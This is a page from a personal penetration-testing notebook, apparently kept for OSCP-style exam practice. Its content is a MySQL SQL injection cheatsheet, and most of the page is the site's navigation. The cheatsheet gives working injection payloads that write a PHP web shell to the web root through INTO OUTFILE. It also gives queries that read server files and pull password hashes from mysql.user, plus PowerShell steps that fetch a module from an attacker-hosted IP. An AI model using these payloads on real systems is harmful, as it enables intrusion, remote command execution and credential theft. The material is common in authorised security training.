💎
kashz-jewels
  • kashz jewels
  • about kashz
  • oscp exam review
  • pnpt exam review
  • certification exam
  • c2 frameworks
  • kashz-kali
  • OS-LINUX
    • basic
    • linux-enumeration
      • enumeration auto
      • enumeration manual
    • linux-privilege-escalation
      • socat shells
      • sudo su styles
      • dirtyc0w
  • OS-WINDOWS
    • basic
    • windows-enumeration
      • enumeration auto
      • enumeration manual
      • enumeration tools
    • windows-privilege-escalation
      • privesc tools
      • steal NTLM creds
      • socat shells
      • beef browser exploitation
    • windows-post-exploitation
      • dump SAM SYSTEM
      • RDP tools
    • windows-bypass-uac
      • fodhelper
    • windows meterpreter
  • SHELLCODES
    • shells
    • windows shells
  • ACTIVE-DIRECTORY
    • active directory 101
    • kerberos 101
    • asrep roasting
    • kerberoasting
    • powerview.ps1
    • ad module
    • bloodhound
    • golden silver passing ticket
    • group policy management
    • dcsync
    • kerberos backdoor
    • mitm6
    • smb relay ntlmrelayx
    • responder
    • zero logon exploit
    • untested tools
  • OSINT
    • osint
  • BUFFER OVERFLOW GUIDE
    • exploit.py
    • fuzzer.py
    • methodology
  • HASH-n-CRACK
    • crackmapexec
    • hash identifier
    • hashcat
    • hydra
    • john the ripper
    • medusa
    • ncrack
    • rsa
  • TRICKS
    • .mdb file
    • 403 forbidden waf bypass
    • archive, unarchive
    • asp.net server
    • awscli
    • bash scripting
    • bypass bash restrictions
    • curl
    • ffuf wfuzz feroxbuster gobuster
    • file modification
    • git commands
    • git repo analysis
    • http request smuggling
    • json web token (jwt)
    • kali exploit compilation
    • kali multi-network adapters
    • local discovery
    • login bypass
    • magic bytes
    • nmap
    • office document analysis and exploitation
    • openvpn
    • pgp gpg cheatsheet
    • php wrappers, LFI
    • port forwarding
    • port knocking
    • post upload file
    • share files
    • ssh tunnel
    • subnet scan
    • ssh
    • wget
    • wifi
    • windows AppLocker bypass
    • wordlists
    • xss steal cookie
  • PROTOCOLS
    • dns :53
    • epmd :4369
    • ftp :21
    • ident :113
    • imap :143 :993
    • ipsec ike-vpn :500/udp
    • irc
    • ldap :389 :636 :3268 :3269
    • rpc
    • smb :135 :139 :445
    • smtp :25
    • subversion svn :3690
    • tftp :69
  • ATTACKS
    • .hta exploit
    • network scripts
    • print nightmare
    • ssrf
    • xml external entity XXE
  • CHEATSHEET
    • docker
    • drupal
    • gitlab rails
    • impacket guide
    • itemir/apache2fa
    • jenkins
    • jinja2 flask template injection
    • mimikatz
    • powershell
    • redis
    • sqli oracle odat
    • sqli basic
    • sqli influxql
    • sqli mongo
    • sqli ms-sql
    • sqli mysql
    • sqli oracle-sql
    • sqli postgres-sql
    • telnet
    • webdav
    • wordpress
  • SERVICES
    • achat
    • adminLTE
    • adminer.php
    • comment system
    • amanda
    • apache
    • apache exploits
    • apphp microblog
    • arj
    • azure cloud
    • b2evolution
    • bigtree cms
    • bludit cms
    • booked scheduler
    • cacti
    • centreon
    • chef knife
    • cloudMe
    • cms made simple
    • cmsmini
    • coldfusion
    • corehttp
    • cs cart
    • cse online bookstore
    • cuppa cms
    • cutenews cms
    • distccd (DistCC Daemon)
    • docker
    • dolphin2 cms
    • dosbox
    • drupal
    • elastic freepbx
    • elasticsearch kibana
    • epmd
    • exim
    • fail2ban
    • ftp exploits
    • fudforum
    • gitlab community edition
    • gunicorn
    • gym management system
    • h2 database
    • hp power manager
    • iis
    • james remote admin tool
    • jenkins exploits
    • katris
    • koken cms
    • ladon framework
    • laravel
    • lxd
    • magento
    • manage engine applications manager
    • manage engine service desk plus
    • mantis bugtracker
    • monstra cms
    • msfvenom apk
    • mysql exploit
    • nagios xi
    • network video monitoring system
    • nextcloud
    • nginx
    • nodebb
    • nostromo
    • nsclient
    • nsupdate
    • openNetAdmin ona
    • opendocman
    • openemr
    • opensmtpd
    • osclass
    • orient-db-server
    • otrs open ticket request system
    • ovidentia
    • pfsense
    • php file vault
    • php powerbrowse
    • php
    • phpliteadmin
    • phpmyadmin
    • phreebooks bizuno
    • plantronics hub
    • postfix smtp
    • postgres
    • python2 python3
    • quick cms
    • rabbitmq
    • raspAP
    • rconfig management
    • redis exploits
    • rejetto httpfileserver
    • remote-mouse
    • responsive filemanager
    • saltstack
    • sendmail
    • simple php photo gallery
    • small crm
    • smartermail
    • smartstore.net
    • smb exploits
    • sonatype nexus
    • splunk universal forwarder
    • ssh exploits
    • strapi cms
    • subrion cms
    • sudo
    • teamviewer
    • tmux
    • tomcat
    • umbraco
    • unifi video
    • unreal irc
    • usbcreator
    • vtiger crm
    • webcalendar
    • webmin :10000
    • werkzeug httpd
    • windows UsoSvc service
    • windows exploits
    • windows iot core
    • windows token exploits
    • wise care 365, wisebootassistant
    • wordpress plugin exploits
    • xampp
    • yaml
    • yum
    • zabbix
    • zenphoto cms
    • zookeeper exhibitor
Powered by GitBook
On this page
  • Checks for UDF (if root on mysql)
  • SQLi shell
  • my-sql commands
  • mysql w/ powershell
  • Error based

Was this helpful?

  1. CHEATSHEET

sqli mysql

Checks for UDF (if root on mysql)

# checking if database has been misconfigured to allow insecure handling of files.
SHOW VARIABLES LIKE "secure_file_priv";

# where udf files are loaded from
@@plugin_dir;
SHOW VARIABLES LIKE 'plugin_dir';

# show all vars
SHOW variables;

# show PERMS
SHOW Grants;

SQLi shell

# windows
?id=1 union all select 1,2,"<?php echo system($_GET['cmd']);?>",4 into OUTFILE 'c:/xampp/htdocs/cmd.php'

# linux
?id=1 union all select 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4 into OUTFILE '/var/www/html/cmd.php'
# try: "<?php echo exec($_GET["cmd"]);"
# try: replace "php-payload" with (php-payload)

my-sql commands

# comments
#
--
/* <blah> */

# concatenation
# 0x3a separates the field with a ':'
concat(col_1,col_2)
concat(col_1,0x3a,col_2)
concat(0x28,col_1,0x3a,col_2,0x29)
col_1|| '~' || col_2

# hostname
@@hostname

# data directory
@@datadir

# version
@@version
version()

# read-file
# C:\Windows\System32\Drivers\etc\hosts
# C:\\Windows\\System32\\Drivers\\etc\\hosts
LOAD_FILE('<file>')
TO_BASE64(LOAD_FILE('<file>'))

# users
user()
system_user()
| SELECT user FROM mysql.user

# password (md5)
# TO_BASE64(password)
| SELECT password FROM mysql.user

# databases
database()
| SELECT schema_name FROM information_schema.schemata;

# tables
SELECT table_name FROM information_schema.tables WHERE table_schema='<db>'
# can use WHERE table_schema IN (0x<table-in-hex>, 0x<table-in-hex>)

# cols
SELECT column_name FROM information_schema.columns WHERE table_name='<table>'
describe [<db>.]<table>

# nth row
# to get total-rows
SELECT count(*) FROM <table>
# enumerate incrementally
SELECT <col> FROM <table> LIMIT <n>,1
SELECT <col> FROM <table> LIMIT 1 OFFSET <n>

mysql w/ powershell

wget https://github.com/adbertram/MySQL/archive/master.zip -O MySQL.zip

# setup
Invoke-WebRequest  -Uri http://IP/MySQL.zip -OutFile 'C:\MySQL.zip'

$modulesFolder = 'C:\Program Files\WindowsPowerShell\Modules'
Expand-Archive -Path C:\MySql.zip -DestinationPath $modulesFolder
Rename-Item -Path "$modulesFolder\MySql-master" -NewName MySQL

# usage
$user = '<user>'
$password = ConvertTo-SecureString '<password>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($user, $password)

Connect-MySqlServer -Credential $credential -ComputerName 'localhost' -Database "<db>"
Invoke-MySqlQuery  -Query "select @@version;"

Error based

Previoussqli ms-sqlNextsqli oracle-sql

Last updated 3 years ago

Was this helpful?

known bug fix:

mcpmag.com/querying-mysql-databases.aspx/
adamtheautomator.com/powershell-get-credential/#Create_a_Credential_without_a_Prompt
perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/